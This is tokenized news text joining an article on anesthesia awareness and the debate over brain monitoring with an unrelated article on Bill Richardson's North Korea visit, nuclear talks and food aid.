Heart or lung problems , daily alcohol consumption , and long - term use of opiates and other drugs may put patients at higher risk for anesthesia awareness , according to the Mayo Clinic .
Weiher started a campaign called the Anesthesia Awareness Campaign that seeks to educate people about the perils of waking up during surgery .
She has spoken with about 4,000 people worldwide who have also had anesthesia awareness experiences .
The American Society of Anesthesiologists is engaged in an Anesthesia Awareness Registry , a research project through the University of Washington to examine cases of the phenomenon .
One of the goals of the Anesthesia Awareness Campaign is to make brain activity monitoring a standard of care .
There has been controversy about the use of brain function monitors in general anesthesia .
Advocates such as Dr. Barry Friedberg , anesthesiologist and founder of the nonprofit Goldilocks Anesthesia Foundation , say brain monitoring is essential for ensuring the patient achieves the appropriate sedation so as to not wake up .
The monitors use a scale of 0 to 100 to reflect what 's going on in the brain : 0 is a total absence of brain activity , 98 to 100 is wide awake , and 45 to 60 is about where general anesthesia puts the patient , Friedberg said .
But a 2008 study in the New England Journal of Medicine found no benefit in using brain function monitoring to prevent anesthesia awareness .
The American Society of Anesthesiology has said the monitoring is not routinely indicated for general anesthesia , but may have some value and be appropriate for specific patients .
The downsides are that they are expensive , and should not be used in place of heart rate and breathing signals when regulating the anesthesia .
Research does not consistently demonstrate a benefit from using brain function monitors , and the decision to use them should be made on an individual basis , Hannenberg said .
The anesthesiologist carefully monitors the patient 's breathing and blood pressure , which can rise and fall , while the person is under the anesthetic , Hannenberg said .
The treatment is tailored to the patient -- a young , healthy athlete will tolerate fluctuations in blood pressure better than someone with a serious condition , Hannenberg said .
As with surgical procedures themselves , anesthesia can result in stroke , heart attack and death .
Such complications are more likely in people who have serious medical problems , and elderly people .
Over the last two decades , anesthesiologists have made significant strides in reducing those risks , Hannenberg said .
A 6 - year - old boy in Richmond , Virginia , recently died after going into cardiac arrest during a routine dental procedure that involved general anesthesia , CNN affiliate WTVR reported .
Weiher had to have subsequent surgeries , including an operation on her other eye and a hysterectomy , and the experiences were terrifying .
She is still taking medication for post - traumatic stress disorder as a result of her anesthesia awareness experience .
Mr Richardson was allowed to tour Yongbyon nuclear plant
Bill Richardson said he was " very pleased " with North Korea 's willingness to make progress in six -nation talks .
Pyongyang has already pledged to abandon its nuclear weapons in an earlier round of the talks .
Mr Richardson , former US ambassador at the UN , said North Korea now wanted to focus on a civilian nuclear programme .
" Their view is that what needs to be addressed is the light water reactor , " he said .
North Korea has said it will renounce its nuclear weapons in exchange for aid and security guarantees and foreign help in building a civilian nuclear programme .
Mr Richardson said Pyongyang officials had indicated they may eventually allow US and other monitors into the country to ensure none of the spent fuel from a civilian reactor is diverted to weapons .
' Show of transparency '
Mr Richardson , the governor of the US state of New Mexico , spent several days meeting North Korean officials and touring their nuclear facilities last week .
He later told the South Korean foreign minister that the North had indicated it was willing to comply with international non-proliferation treaties and to allow UN monitoring of its nuclear programme .
" I was impressed with their tone , and their commitment to principles , " he told reporters in the South Korean capital , Seoul .
Mr Richardson said he had been allowed to tour a nuclear facility in Yongbyon , in an apparent " show of transparency " that " bodes well for six - party talks " .
The next round of talks - involving the two Koreas , China , Japan , the US and Russia - will be held in the first week of November , he said .
" My view is that we should not expect an agreement in the next round , " he said .
" There will be measurable progress that might lead to a future agreement . "
Food aid
The nuclear dispute with Pyongyang began in late 2002 , when the US accused North Korea of having a uranium - based nuclear arms programme , in violation of international agreements .
Separately , Mr Richardson said North Korea had told him UN food aid workers will be allowed to remain in the country , reversing an earlier threat to kick them out .
In recent years , the UN and other international agencies have been feeding up to six million of the poorest and most vulnerable North Koreans .
Mr Richardson said a new agreement could enable the UN's World Food Programme workers to stay on " under a renewed definition of what development aid is " .
